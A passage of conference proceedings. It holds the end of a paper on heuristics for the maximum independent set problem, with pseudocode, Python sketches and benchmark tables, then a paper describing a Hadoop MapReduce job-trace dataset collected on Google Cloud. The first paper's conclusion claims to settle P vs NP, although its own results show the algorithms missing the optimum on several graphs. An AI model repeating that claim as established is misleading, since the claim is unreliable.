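One possible reading of Algorithm II can be sketched as follows. This is an illustration under several assumptions, not the implementation used for the results: since a vertex and its primed copy always receive the same bit, the bookkeeping is done on the vertices of G; the remaining vertices are scanned in a fixed order; and the example adjacency is the graph inferred from the worked example of Sect. 4.3. The routine is a restarted greedy procedure, so in general it returns a maximal independent set that is not guaranteed to be maximum.

```python
def algorithm_two(vertices, adjacency):
    """Greedy pair assignment, restarted from every vertex; keeps the best set."""
    order = list(vertices)
    best = set()
    for start in order:
        bit = {start: 1}              # start and start' are assigned 1
        for nb in adjacency[start]:
            bit[nb] = 0               # their neighbours are assigned 0
        for r in order:
            if r in bit:
                continue
            # Defensive check mirroring the conflict rule of the text:
            # r may be 1 only if none of its neighbours is already 1.
            if any(bit.get(nb) == 1 for nb in adjacency[r]):
                bit[r] = 0
            else:
                bit[r] = 1
                for nb in adjacency[r]:
                    bit.setdefault(nb, 0)
        chosen = {v for v, b in bit.items() if b == 1}
        if len(chosen) > len(best):
            best = chosen
    return best

# Assumed adjacency of G, inferred from the worked example of Fig. 8.
adjacency = {1: [4], 2: [5], 3: [6], 4: [1, 5, 6], 5: [2, 4, 6], 6: [3, 4, 5]}
best = algorithm_two(range(1, 7), adjacency)
print(sorted(best))
```

With n starting vertices and a scan over all vertices and their neighbours per start, the running time of this sketch is polynomial in n, in line with the O(n³) estimate of the text.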
start at any vertex v ∈ T;
marker:
v ← 1, v′ ← 1;
if last step makes two adjacent vertices assigned 1 then
    v ← 0, v′ ← 0;
end if
all N(v, v′) ← v̄;
if all vertices were visited then
    MIS = vertices assigned 1;
    Quit;
end if
∀r ∈ N(N(v, v′)); set v = r;
goto marker;
Algorithm 1: Search Algorithm to Find a Maximum Independent Set by Tracing Graph T; v̄ is the complement of the bit assigned to vertex v.
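The tracing procedure of Algorithm 1 leaves some details open, so the following is only one possible interpretation, written as a breadth-first trace. The assumptions are: a vertex and its primed copy share the same bit, so the trace runs on G; each newly reached vertex receives the complement of the bit of the vertex it was reached from; and a vertex that would receive 1 next to a vertex already assigned 1 is set to 0 instead. The adjacency used is the graph inferred from the worked example of Sect. 4.3.

```python
from collections import deque

def algorithm_one(adjacency, start):
    """Trace the graph from `start`, alternating bits and resolving conflicts."""
    bit = {start: 1}
    queue = deque([start])
    while queue:
        v = queue.popleft()
        for r in adjacency[v]:
            if r in bit:
                continue
            candidate = 1 - bit[v]    # complement of the bit of the previous vertex
            if candidate == 1 and any(bit.get(nb) == 1 for nb in adjacency[r]):
                candidate = 0         # conflict: an adjacent vertex is already 1
            bit[r] = candidate
            queue.append(r)
    return {v for v, b in bit.items() if b == 1}

def best_over_all_starts(adjacency):
    """Repeat the trace from every vertex and keep the largest set found."""
    return max((algorithm_one(adjacency, s) for s in adjacency), key=len)

# Assumed adjacency of G, inferred from the worked example of Fig. 8.
adjacency = {1: [4], 2: [5], 3: [6], 4: [1, 5, 6], 5: [2, 4, 6], 6: [3, 4, 5]}
from_vertex_one = algorithm_one(adjacency, 1)
print(sorted(from_vertex_one), len(best_over_all_starts(adjacency)))
```

The trace only reaches the connected component of the starting vertex, and like any greedy trace it may stop at a maximal rather than a maximum independent set.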
4.3 Example Graphs
In Fig. 8 we see a graph T in (A) and its tree representation in (B). Δuu′ is even and at least 4, such as Δ11′ = Δ22′ = 6 and Δ44′ = 4. Note that Δab = Δa′b′ and Δab′ = Δa′b, such as Δ13 = Δ1′3′ = 5 and Δ15′ = Δ1′5 = 4. If we take 1, 2′, 6′ then we must exclude 3, 4, 5 and also 3′, 4′, 5′; thus the maximum maximal independent set in T is 1, 1′, 2, 2′, 6, 6′ and the maximum independent set in G is 1, 2, 6. Now, when we apply algorithm 2, we start with a vertex, let it be 1, so we set vertices 1 and 1′ to 1. All their neighbours, 4 and 4′, are set to 0. We pick a vertex different from 1, 1′, 4 and 4′ and set it and its pair to 1; let that vertex be 2, for example, so we set 2 and 2′ to 1. Now all neighbours of 2 and 2′, i.e. 5 and 5′, are set to 0, and we have 3, 3′, 6 and 6′ left. We can set either of the remaining pairs to 1 and the other to 0, so the maximum independent sets are {1, 2, 6} or {1, 2, 3}. Note that we may converge to a maximal independent set that is not a maximum independent set, but by starting from a vertex that belongs to only one maximum independent set we are sure to converge to that maximum independent set. Now, following algorithm 1 and starting from vertices 1, 1′, we set both to 1 and start tracing the tree, so 4, 4′ are set to 0 and then 5, 6, 5′, 6′ are all set to 1. However, we now have a conflict: the adjacent vertices 5 and 6′, and likewise 5′ and 6, are set to 1. By taking only one of 5 or 6 and setting it and its pair to 1, we avoid that conflict. Let us say we set 5 and 5′ to 1; hence the next vertices on the path, 2′, 6′ and 2, 6, are set to 0, and moving from 6 to 3′ (or from 6′ to 3), we set 3 and 3′ to 1. Thus the maximum independent set is {1, 5, 3}.
M. Heal et al.
Fig. 7. Tree Representation of Graph T used in Algorithm 1.
Fig. 8. A Concrete Example of Graph T (A) and its Tree Representation (B) Starting from Vertex 1.
5 Results
We applied Algorithm 1 and Algorithm 2, on a MacBook Pro 2019 with a 2.3 GHz 8-core Intel Core i9 CPU, 32 GB of memory and macOS Monterey, to some of the DIMACS benchmarks for the maximum clique problem [14]; see Table 1. We see good results for all the graphs except one. Algorithm 2 (ω2 is the clique number estimated by the algorithm) is better than Algorithm 1 (ω1 is the clique number estimated by the algorithm) because, when we select another vertex that is not among the neighbours of the previous vertex added to the maximum independent set, there is a better chance that it is a vertex of the maximum independent set. Execution is extremely fast, and Algorithm 1 is the faster of the two. Table 2 shows the independence number of some graphs selected from the House of Graphs database [15]. We also see fair results at extremely high speed. α1 and α2 are the independence numbers estimated by Algorithm 1 and Algorithm 2, respectively. The reason for the failures on a few graphs is that the maximum independent set of these graphs is partitioned into sets of vectors such that each vector is a subset of a maximal independent set; thus the algorithm converges to a maximal independent set. The execution time is in minutes.

Table 1. Some of DIMACS benchmarks for maximum clique
Graph name or No | ω | ω1 | time | ω2 | time
johnson8-2-4 | 4 | 4 | 0.1617 × 10^-3 | 4 | 0.0192
MANN-a9 | 16 | 9 | 0.7075 × 10^-4 | 16 | 0.0263
hamming6-2 | 32 | 32 | 0.1438 × 10^-3 | 32 | 0.0440
hamming6-4 | 4 | 4 | 0.9787 × 10^-4 | 4 | 0.0623
johnson8-4-4 | 14 | 14 | 0.1023 × 10^-3 | 14 | 0.0656
johnson16-2-4 | 8 | 8 | 0.3476 × 10^-3 | 8 | 0.1095
C125.9 | 34 | 26 | 0.4048 × 10^-3 | 31 | 0.1841
keller4 | 11 | 11 | 0.7667 × 10^-3 | 11 | 0.7368

Table 2. Some Graphs from the House of Graphs for Maximum Independent Set
Graph name and/or No | α | α1 | time | α2 | time
Hoffman Graph (1167) | 8 | 5 | 0.625 × 10^-5 | 8 | 0.0020
Hoffman Singleton, BiPartite Double Graph (1169) | 50 | 50 | 0.3691 × 10^-3 | 50 | 0.1074
Hoffman Singleton Complement Graph (1171) | 2 | 2 | 0.2185 × 10^-3 | 2 | 0.0780
Hoffman Singleton Graph (1173) | 15 | 7 | 0.5590 × 10^-3 | 7 | 0.0207
Hoffman Singleton Line Graph (1175) | 25 | 20 | 0.7714 × 10^-3 | 24 | 0.3375
Hoffman Singleton Minus Star Graph (1177) | 14 | 6 | 0.2527 × 10^-4 | 11 | 0.0167
35502 | 12 | 8 | 0.4930 × 10^-4 | 9 | 0.0160
Hanoi Graph-Sierpinski Triangle Level 5 (35481) | 81 | 81 | 0.0022 | 81 | 0.7213
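The results report clique numbers for the DIMACS graphs while the algorithms search for independent sets. The standard link between the two, which is presumably what is used here, is that a clique in a graph G is an independent set in the complement of G. The sketch below checks this relation by brute force on a small hypothetical graph; the helper names are illustrative and the exhaustive search is only practical for tiny inputs.

```python
from itertools import combinations


def complement(vertices, edges):
    """Edges of the complement graph: all vertex pairs that are not edges."""
    edge_set = {frozenset(e) for e in edges}
    return {frozenset(p) for p in combinations(vertices, 2)} - edge_set


def is_independent(subset, edge_set):
    """True if no pair inside `subset` is an edge."""
    return all(frozenset(p) not in edge_set for p in combinations(subset, 2))


def independence_number(vertices, edges):
    """Size of a largest independent set, found by exhaustive search."""
    edge_set = {frozenset(e) for e in edges}
    for k in range(len(vertices), 0, -1):
        if any(is_independent(s, edge_set) for s in combinations(vertices, k)):
            return k
    return 0


def clique_number(vertices, edges):
    """Clique number of G computed as the independence number of its complement."""
    return independence_number(vertices, complement(vertices, edges))


# Hypothetical example: a triangle 1-2-3 with a pendant vertex 4 attached to 3.
VERTICES = [1, 2, 3, 4]
EDGES = [(1, 2), (2, 3), (1, 3), (3, 4)]

if __name__ == "__main__":
    print(clique_number(VERTICES, EDGES), independence_number(VERTICES, EDGES))
```

For this example the largest clique is the triangle and the largest independent sets pair vertex 4 with vertex 1 or 2.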
6 Conclusion and Future Work
We proposed a method to settle the P vs. NP problem by solving an NP-complete problem, namely the maximum independent set problem. Our technique transforms any graph into a perfect graph such that the maximum independent set of the source graph is twice the size of either the maximum independent set or the second largest maximal independent set of the transformed perfect graph. We characterised some important properties of the perfect graph that may help in finding the maximum independent set of the source graph, and proposed two algorithms that find the maximum independent set of the source graph for a special case. The results section shows that the algorithms are very fast. As future work, we will extend the work of [13] to find the second largest maximal independent set of the perfect graph, since the maximum independent set in the source graph is either the maximum or the second largest maximal independent set in the transformed perfect graph.
References
1. Carlson, J.A., Jaffe, A., Wiles, A.: The millennium prize problems. Cambridge, MA, American Mathematical Society, Providence, RI, Clay Mathematics Institute (2006)
2. Goldreich, O.: P, NP, and NP-Completeness: The basics of computational complexity. Cambridge University Press (2010)
3. Garey, M.R., Johnson, D.S.: Computers and intractability, vol. 174. San Francisco: freeman (1979)
4. Fortnow, L.: The status of the P versus NP problem. Commun. ACM 52(9), 78–86 (2009)
5. Baker, T., Gill, J., Solovay, R.: Relativizations of the P=?NP question. SIAM J. Comput. 4(4), 431–442 (1975)
6. Razborov, A.A.: Lower bounds for the monotone complexity of some Boolean functions. Soviet Math. Dokl. vol. 31 (1985)
7. Razborov, A.A.: On the method of approximations. In: Proceedings of the Twenty-First Annual ACM Symposium on Theory of Computing (1989)
8. Furst, M., Saxe, J.B., Sipser, M.: Parity, circuits, and the polynomial-time hierarchy. Math. Syst. Theory 17(1), 13–27 (1984)
9. Haken, A.: The intractability of resolution. Theoret. Comput. Sci. 39, 297–308 (1985)
10. Berge, C.: Färbung von Graphen, deren sämtliche bzw. deren ungerade Kreise starr sind. Wissenschaftliche Zeitschrift (1961)
11. Robertson, N., et al.: The strong perfect graph theorem. Ann. Math. 164(1), 51–229 (2006)
12. Heal, M.H.: Simple proofs of the strong perfect graph theorem using polyhedral approaches and proving P = NP as a conclusion. In: 2020 International Conference on Computational Science and Computational Intelligence (CSCI). IEEE (2020)
13. Grötschel, M., Lovász, L., Schrijver, A.: Geometric algorithms and combinatorial optimization, vol. 2. Springer Science & Business Media (2012)
14. Heal, M., Li, J.: Finding the maximal independent sets of a graph including the maximum using a multivariable continuous polynomial objective optimization formulation. In: Science and Information Conference. Springer, Cham (2020)
15. Brinkmann, G., Coolsaet, K., Goedgebeur, J., Mélot, H.: House of Graphs: a database of interesting graphs. Discrete Appl. Math. 161(1–2), 311–314 (2013). http://hog.grinvin.org
Hadoop Dataset for Job Estimation in the Cloud with Limited Bandwidth
Mohammed Bergui1(B), Nikola S. Nikolov2, and Said Najah1
1 Laboratory of Intelligent Systems and Applications, Department of Computer Science, Faculty of Sciences and Technologies, University of Sidi Mohammed Ben Abdellah, Fez, Morocco [email protected]
2 Department of Computer Science and Information Systems, University of Limerick, Limerick, Ireland
Abstract. Hadoop MapReduce is a well-known open source framework for processing a large amount of data in a cluster of machines; it has been adopted by many organizations and deployed on-premise and on the cloud. MapReduce job execution time estimation and prediction are crucial for efficient scheduling, resource management, better energy consumption, and cost saving. In this paper, we present our new dataset of MapReduce job traces in a cloud environment with limited network bandwidth, and we describe the process of generating and collecting the dataset. We believe that this dataset will help researchers develop new scheduling approaches and improve Hadoop MapReduce job performance.
Keywords: Hadoop · MapReduce · Cloud computing · Bandwidth · Estimating the runtime
1 Introduction
Now, with the development and use of new systems, we are dealing with a large amount of data. Due to the volume, velocity, and variety of this big data, its management, maintenance, and processing require dedicated infrastructures. Apache Hadoop is one of the most well-known big data frameworks [1]; it splits the input data into blocks for distributed storage and parallel processing using the Hadoop Distributed File System (HDFS) and MapReduce on a cluster of machines [15]. One of the characteristics of Hadoop MapReduce is its support for public cloud computing, which allows organizations to use cloud services on a pay-as-you-go basis. This is advantageous for small and medium-sized organizations that cannot implement a sophisticated, large-scale private cloud due to financial constraints. Therefore, running Hadoop MapReduce applications in a cloud environment for big data analytics has become a viable alternative for industrial practitioners and academic researchers.
Since one of the most critical functions of Hadoop is job and resource management, more efficient management will be achieved if the execution time of a job is estimated and predicted accurately. Also, critical resources like CPU, memory, and network bandwidth are shared in a cloud environment and subject to contention. This is an important issue regarding efficient scheduling, better energy consumption, cost saving, congestion detection, and resource management [7,9,12].
Several Hadoop MapReduce performance models have been proposed for either on-premise or cloud deployment [8,10,11,13,14,16]. However, the data generated and collected is not well described. Also, most proposed solutions rely on benchmarks that only process a certain data structure.
This article proposes a new dataset of Hadoop MapReduce version 2 job traces in a cloud environment with limited network bandwidth. For this purpose, we first deploy multiple Hadoop cluster configurations on Google Cloud Platform [5]; then we use a big data benchmark to generate synthetic data with different structures, and this data is processed using SQL-like queries. Lastly, we construct our dataset by extracting MapReduce job traces and cluster configuration parameters using our Python toolkit, which is based on REST APIs provided by the Hadoop framework [2,3].
The remainder of this paper is organized as follows. The Experimental Setup section presents the different types of cluster deployment used in our experiment. The Hadoop MapReduce Job Traces Database section describes the steps to generate synthetic data, process it, and then collect the MapReduce job traces that make up the dataset. Finally, the Conclusion and Future Work section concludes the paper.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023. K. Arai (Ed.): FICC 2023, LNNS 652, pp. 341–348, 2023. https://doi.org/10.1007/978-3-031-28073-3_24

Table 1. The different VM types for Hadoop cluster deployments
Machine types | vCPUs | Memory (GB) | Maximum egress bandwidth (Gbps)
e2-standard-2 | 2 | 8 | 4
e2-standard-4 | 4 | 16 | 8
e2-standard-8 | 8 | 32 | 16
e2-standard-16 | 16 | 64 | 16
e2-highmem-2 | 2 | 16 | 4
e2-highmem-4 | 4 | 32 | 8
e2-highmem-8 | 8 | 64 | 16
e2-highmem-16 | 16 | 128 | 16
Standard persistent storage: 500 GB
2 Experimental Setup
In order to estimate the job execution time, we started by deploying eight different clusters, each with four nodes (one master node and three workers), on Google Cloud Platform. Dataproc is a managed Spark and Hadoop service on Google Cloud Platform that can easily create and manage clusters [5]. The version of Dataproc used is 1.5-centos8, which includes CentOS 8 as the operating system, Apache Spark 2.4.8, Apache Hadoop 2.10.1, Apache Hive 2.3.7, and Python 3.7 [4]. Each cluster has a different worker (slave) configuration, ranging from 2 to 16 vCPUs and from 8 GB to 128 GB of memory, while the type and size of storage were kept the same. The master node configuration was the same throughout the experiment, with 4 vCPUs and 16 GB of memory. The types of VMs used in our experiments are shown in Table 1. After each deployment, we changed the replication factor in HDFS from its default value of 3 to 1. We also had to change the Hive execution engine from Tez to MapReduce for the experiment. We then limited the workers’ maximum network bandwidth four times on each cluster deployment, to 4.6 Gbps, 2.3 Gbps, 1.1 Gbps, and 0.7 Gbps.

Table 2. Benchmark dataset tables names and sizes
Table | Size
data/customer | 128.5 MB
data/customer_address | 51.9 MB
data/customer_demographics | 74.2 MB
data/date_dim | 14.7 MB
data/household_demographics | 151.5 KB
data/income_band | 327 B
data/inventory | 16.3 GB
data/item | 65.0 MB
data/item_marketprices | 66.6 MB
data/product_reviews | 633.2 MB
data/promotion | 568.5 KB
data/reason | 38.2 KB
data/ship_mode | 1.2 KB
data/store | 33.0 KB
data/store_returns | 708.6 MB
data/store_sales | 14.7 GB
data/time_dim | 4.9 MB
data/warehouse | 2.2 KB
data/web_clickstreams | 29.7 GB
data/web_page | 98.4 KB
data/web_returns | 870.4 MB
data/web_sales | 21.1 GB
data/web_site | 8.6 KB
data_refresh/customer | 1.3 MB
data_refresh/customer_address | 537.2 KB
data_refresh/inventory | 168.7 MB
data_refresh/item | 673.2 KB
data_refresh/item_marketprices | 26.2 MB
data_refresh/product_reviews | 6.3 MB
data_refresh/store_returns | 7.3 MB
data_refresh/store_sales | 152.5 MB
data_refresh/web_clickstreams | 308.5 MB
data_refresh/web_returns | 8.8 MB
data_refresh/web_sales | 219.1 MB
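The deployment matrix of this section can be enumerated programmatically. The following is a minimal sketch, assuming that each of the eight worker machine types of Table 1 corresponds to one cluster deployment and that every deployment is run under each of the four bandwidth caps. The names `experiment_grid` and `FIXED_SETTINGS` are hypothetical; `dfs.replication` and `hive.execution.engine` are the standard Hadoop and Hive property names for the two settings mentioned in the text, which the paper itself does not spell out.

```python
from itertools import product

# Worker machine types from Table 1 (assumed: one cluster deployment per type).
WORKER_TYPES = [
    "e2-standard-2", "e2-standard-4", "e2-standard-8", "e2-standard-16",
    "e2-highmem-2", "e2-highmem-4", "e2-highmem-8", "e2-highmem-16",
]

# Worker bandwidth caps applied on every deployment, in Gbps.
BANDWIDTH_CAPS_GBPS = [4.6, 2.3, 1.1, 0.7]

# Settings held constant across runs (standard property names, assumed here).
FIXED_SETTINGS = {"dfs.replication": 1, "hive.execution.engine": "mr"}


def experiment_grid(worker_types=WORKER_TYPES, caps=BANDWIDTH_CAPS_GBPS):
    """Return one dict per (worker type, bandwidth cap) combination."""
    return [
        {"worker_type": w, "bandwidth_gbps": c, **FIXED_SETTINGS}
        for w, c in product(worker_types, caps)
    ]


if __name__ == "__main__":
    grid = experiment_grid()
    print(len(grid), "configurations; first:", grid[0])
```

Under these assumptions the grid contains 8 × 4 = 32 configurations.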
3 The Hadoop MapReduce Job Traces Database
This paper proposes a Hadoop MapReduce job traces dataset in a cloud environment with limited network bandwidth1. This dataset includes many Hadoop MapReduce jobs based on multiple processing methods (MapReduce, Pure QL, NLP, ...) and different data structures. This dataset will help researchers develop new scheduling approaches and improve Hadoop MapReduce performance. This dataset has been constructed to predict the amount of intermediate data that needs to be transferred over a limited network and to predict the job execution time regardless of the type of the query statement.
1 The dataset is available upon request from the corresponding author.
Table 3. The Distribution of the Different Query Types and the Data Types
Query | Data type | Method
1 | Structured | UDF/UDTF
2 | Semi-Structured | Map Reduce
3 | Semi-Structured | Map Reduce
4 | Semi-Structured | Map Reduce
6 | Structured | Pure QL
7 | Structured | Pure QL
8 | Semi-Structured | Map Reduce
9 | Structured | Pure QL
10 | Un-Structured | UDF/UDTF/NLP
11 | Structured | Pure QL
12 | Semi-Structured | Pure QL
13 | Structured | Pure QL
14 | Structured | Pure QL
15 | Structured | Pure QL
16 | Structured | Pure QL
17 | Structured | Pure QL
19 | Un-Structured | UDF/UDTF/NLP
21 | Structured | Pure QL
22 | Structured | Pure QL
23 | Structured | Pure QL
27 | Un-Structured | UDF/UDTF/NLP
29 | Structured | UDF/UDTF
30 | Semi-Structured | UDF/UDTF/Map Reduce

3.1 Data Generation
To evaluate the efficiency of Hadoop-based Big Data systems, we used the TPCx-BB Express Benchmark BB [6]. By executing 30 frequently used analytic queries in the context of retailers, it evaluates the performance of software and hardware components. For structured data, SQL queries can make use of Hive or Spark, while for semi-structured and unstructured data, machine learning methods make use of ML libraries, user-defined functions, and procedural programs.
Data Generation in HDFS. In order to populate HDFS with structured, semi-structured, and unstructured data, TPCx-BB uses an extension of the Parallel Data Generation Framework (PDGF). PDGF is a parallel data generator that generates a large amount of data for an arbitrary schema. The existing PDGF can generate the structured part of the benchmark model; however, it cannot generate the unstructured text of the product reviews. First, PDGF is extended to produce a key-value data set for a fixed set of mandatory and optional keys. This is enough to generate the weblog part of the benchmark. To generate unstructured data, an algorithm based on the Markov chain technique is used to produce synthetic text based on sample input text; the initial sample input consists of real product reviews from an online retail store. The benchmark defines a set of scaling factors based on the approximate size of the raw data generated by PDGF in gigabytes. In our experiment, we used a scale factor of 100, resulting in approximately 90 GB of data evenly spread over three data nodes. Table 2 shows the names and sizes of the tables. It should be noted that the sizes of the tables differ between executions of the data generation, i.e., the size of the tables is different on each cluster deployment. The generated data set is mainly unstructured, and structured data accounts for only 20%.
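The Markov chain idea used for the unstructured review text can be illustrated with a small generator. This is only a sketch of the general technique, assuming a first-order, word-level chain; the benchmark's actual generator is not described here, and the function names and the sample text are hypothetical.

```python
import random
from collections import defaultdict


def build_chain(sample_text):
    """Map each word to the list of words that follow it in the sample."""
    words = sample_text.split()
    chain = defaultdict(list)
    for current, following in zip(words, words[1:]):
        chain[current].append(following)
    return dict(chain)


def generate(chain, start, max_words, seed=0):
    """Random walk over the chain, starting at `start`, up to `max_words` words."""
    rng = random.Random(seed)  # seeded so that runs are repeatable
    output = [start]
    while len(output) < max_words:
        followers = chain.get(output[-1])
        if not followers:
            break  # the last word never had a successor in the sample
        output.append(rng.choice(followers))
    return " ".join(output)


# Hypothetical stand-in for a sample of real product reviews.
SAMPLE = "the product is good the product is cheap the service is good"

if __name__ == "__main__":
    chain = build_chain(SAMPLE)
    print(generate(chain, "the", 8))
```

Every consecutive word pair in the output also occurs in the sample, so the synthetic text keeps the local statistics of the input while varying its overall content.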
Specification of Hadoop MapReduce Jobs. We ran our experiments with the Hive-based queries provided by the benchmark [6]. Of the 30 queries, we were able to run 23; the remaining seven rely on frameworks that are not in the scope of our experiment. The queries are complex, containing various clauses such as SELECT, ORDER BY, GROUP BY, CLUSTER BY, and all kinds of JOIN clauses. The distribution of the different query types and the data types they access is shown in Table 3.
3.2 Data Collection
The queries generated 101 jobs and 1595 to 1604 tasks per cluster configuration, totaling 3232 jobs and 50732 tasks. In order to collect information about these jobs, we developed a Python toolkit for collecting information about the applications, jobs, job counters, and tasks. The toolkit makes use of the REST APIs provided by the Hadoop framework [2,3] and of SSH to collect data about applications, jobs, job counters, tasks, cluster metrics, and framework configuration by making HTTP requests, connecting to the master node through SSH, and parsing JSON and XML files. The features collected and their descriptions for application, cluster metrics, and YARN configuration are shown in Table 4. Job and job counter features are shown in Table 5; finally, task features are presented in Table 6.

Table 4. Application, Cluster and YARN Collected Features
Object type: Application, Scheduler, Cluster metrics and framework configuration
How data were acquired: ResourceManager REST APIs allow getting information about the cluster, scheduler, nodes, and applications; connecting through SSH and parsing yarn-site.xml
File: CSV file, applications.csv
Group | Feature name | Type | Description
Application | id | string | The application id
Application | elapsedTime | long | The elapsed time since the application started (in ms)
Application | memorySeconds | long | The amount of memory the application has allocated
Application | vcoreSeconds | long | The number of CPU resources the application has allocated
Cluster metrics | totalMB | long | The amount of total memory in MB
Cluster metrics | totalVirtualCores | long | The total number of virtual cores
Cluster metrics | totalNodes | int | The total number of nodes
Cluster metrics | networkBandwidth | long | The maximum available network bandwidth for each node
YARN configuration | yarn-nodemanager-resource-memory | long | Amount of physical memory, in MB, that can be allocated for containers
YARN configuration | yarn-nodemanager-resource-cpu-vcores | int | Number of vcores that can be allocated for containers
YARN configuration | yarn-scheduler-maximum-allocation | long | The maximum allocation for every container request at the RM in MBs
YARN configuration | yarn-scheduler-minimum-allocation | long | The minimum allocation for every container request at the RM in MBs

Table 5. Job and job counters collected features
Object type: Job and MapReduce configuration
How data were acquired: MapReduce History Server REST APIs allow getting the status of finished jobs; connecting through SSH and parsing mapred-site.xml
File: CSV file, jobs.csv
Group | Feature name | Type | Description
Job features | id | string | The job id
Job features | startTime | long | The time the job started
Job features | finishTime | long | The time the job finished
Job features | mapsTotal | int | The total number of maps
Job features | reducesTotal | int | The total number of reduces
Job features | avgShuffleTime | long | The average time of the shuffle (in ms)
MapReduce configuration | mapreduce-job-maps | int | The number of map tasks per job
MapReduce configuration | mapreduce-map-cpu-vcores | int | The number of virtual cores to request from the scheduler for each map task
MapReduce configuration | mapreduce-reduce-memory | long | The amount of memory to request from the scheduler for each reduce task
MapReduce configuration | mapreduce-job-reduce-slowstart-completedmaps | float | Fraction of the number of maps in the job which should be complete before reduces are scheduled for the job
MapReduce configuration | mapreduce-task-io-sort | long | The total amount of buffer memory to use while sorting files, in megabytes
Object type: Job Counters
How data were acquired: MapReduce History Server REST APIs allow getting the status of finished jobs
File: CSV file, counters.csv
Group | Feature name | Type | Description
Counters features | id | string | The job id
Counters features | map-input-records | long | The number of records processed by all the maps
Counters features | map-output-records | long | The number of output records emitted by all the maps
Counters features | reduce-shuffle-bytes | long | Map output copied to Reducers
Counters features | file-bytes-read-map | long | The number of bytes read by Map tasks from the local file system
Counters features | hdfs-bytes-read-map | long | The number of bytes read by Map and Reduce tasks from HDFS

Table 6. Task collected features
Object type: Task
How data were acquired: MapReduce History Server REST APIs allow getting the status of finished tasks
File: CSV file, tasks.csv
Group | Feature name | Type | Description
Task features | id | string | The task id
Task features | Job-id | string | The job id
Task features | type | string | The task type - MAP or REDUCE
Task features | elapsedTime | long | The elapsed time since the application started
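The collection step described in this section can be sketched as follows. This is not the authors' toolkit, which is not published here; it is a minimal illustration under stated assumptions. The host name `master-node` and all function names are hypothetical. The URL path follows the documented MapReduce History Server REST API for a single job, whose JSON response wraps the job fields in a `job` object, and the XML parser assumes the usual Hadoop `<configuration><property>` layout of files such as yarn-site.xml.

```python
import csv
import io
import json
import xml.etree.ElementTree as ET
from urllib.request import Request, urlopen

HISTORY_SERVER = "http://master-node:19888"  # hypothetical host; 19888 is the usual default port

JOB_FIELDS = ["id", "startTime", "finishTime", "mapsTotal", "reducesTotal", "avgShuffleTime"]


def fetch_job(job_id, base_url=HISTORY_SERVER):
    """GET one finished job from the History Server and decode the JSON body."""
    request = Request(
        f"{base_url}/ws/v1/history/mapreduce/jobs/{job_id}",
        headers={"Accept": "application/json"},
    )
    with urlopen(request) as response:
        return json.load(response)


def job_row(payload):
    """Keep only the job features listed for jobs.csv."""
    job = payload["job"]
    return {field: job.get(field) for field in JOB_FIELDS}


def read_hadoop_config(xml_text, wanted):
    """Extract selected properties from a Hadoop *-site.xml document."""
    root = ET.fromstring(xml_text)
    values = {}
    for prop in root.iter("property"):
        name = prop.findtext("name")
        if name in wanted:
            values[name] = prop.findtext("value")
    return values


def to_csv(rows, fields):
    """Serialise a list of dict rows as CSV text with a header line."""
    buffer = io.StringIO()
    writer = csv.DictWriter(buffer, fieldnames=fields, lineterminator="\n")
    writer.writeheader()
    writer.writerows(rows)
    return buffer.getvalue()
```

A typical use would call `fetch_job` for each job id, pass the result through `job_row`, and write all rows with `to_csv`; the parsing functions can be exercised offline with a saved JSON response or a copy of yarn-site.xml.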
4 Conclusion and Future Work
Apache Hadoop is a well-known open-source platform for handling large amounts of data. The runtime of a job needs to be estimated accurately for better management. This paper proposes a Hadoop MapReduce job traces dataset in a cloud environment with limited network bandwidth. A big data benchmark and different cluster deployments are used to generate MapReduce job traces; the dataset contains information about cluster and framework configuration as well as applications, jobs, counters, and tasks. The purpose of this dataset is to help researchers develop new scheduling approaches and improve Hadoop MapReduce job performance. As future work, we plan to extend the proposed dataset to include network bandwidth fluctuations and heterogeneous machine configurations. Also, by extending the dataset, we plan to work on predicting job execution time in a geo-distributed Hadoop cluster.
References
1. Apache hadoop
2. Apache hadoop 2.10.1 – resourcemanager rest apis
3. Apache hadoop mapreduce historyserver – mapreduce history server rest apis
4. Dataproc image version list - dataproc documentation - google cloud
5. Dataproc - google cloud
6. Tpcx-bb express big data benchmark
7. Alapati, S.R.: Expert Hadoop Administration: Managing, Tuning, and Securing Spark, YARN, and HDFS, 1st edn. Addison-Wesley Professional (2016)
8. Ceesay, S., Barker, A., Lin, Y.: Benchmarking and performance modelling of mapreduce communication pattern. In: 2019 IEEE International Conference on Cloud Computing Technology and Science (CloudCom), pp. 127–134 (2019)
9. Heidari, S., Alborzi, M., Radfar, R., Afsharkazemi, M., Ghatari, A.: Big data clustering with varied density based on mapreduce. J. Big Data 6, 08 (2019)
10. Kadirvel, S., Fortes, J.A.B.: Grey-box approach for performance prediction in mapreduce based platforms. In: 2012 21st International Conference on Computer Communications and Networks (ICCCN), pp. 1–9 (2012)
11. Khan, M., Jin, Y., Li, M., Xiang, Y., Jiang, C.: Hadoop performance modeling for job estimation and resource provisioning. IEEE Trans. Parallel Distrib. Syst. 27(2), 441–454 (2016)
12. Singh, R., Kaur, P.: Analyzing performance of apache tez and mapreduce with hadoop multinode cluster on amazon cloud. J. Big Data 3, 10 (2016)
13. Song, G., Meng, Z., Huet, F., Magoules, F., Yu, L., Lin, X.: A hadoop mapreduce performance prediction method. In: 2013 IEEE 10th International Conference on High Performance Computing and Communications & 2013 IEEE International Conference on Embedded and Ubiquitous Computing, pp. 820–825 (2013)
14. Tariq, H., Al-Sahaf, H., Welch, I.: Modelling and prediction of resource utilization of hadoop clusters: a machine learning approach. In: Proceedings of the 12th IEEE/ACM International Conference on Utility and Cloud Computing, UCC 2019, pp. 93–100. Association for Computing Machinery, New York (2019)
15. White, T.: Hadoop: The Definitive Guide. O’Reilly Media Inc., 4th edn. (2015)
16. Zhang, Z., Cherkasova, L., Loo, B.T.: Benchmarking approach for designing a mapreduce performance model. In: Proceedings of the 4th ACM/SPEC International Conference on Performance Engineering, ICPE 2013, pp. 253–258. Association for Computing Machinery, New York (2013)
Survey of Schema Languages: On a Software Complexity Metric
Kehinde Sotonwa(B), Johnson Adeyiga, Michael Adenibuyan, and Moyinoluwa Dosunmu
Bells University of Technology, Ota, Nigeria [email protected]
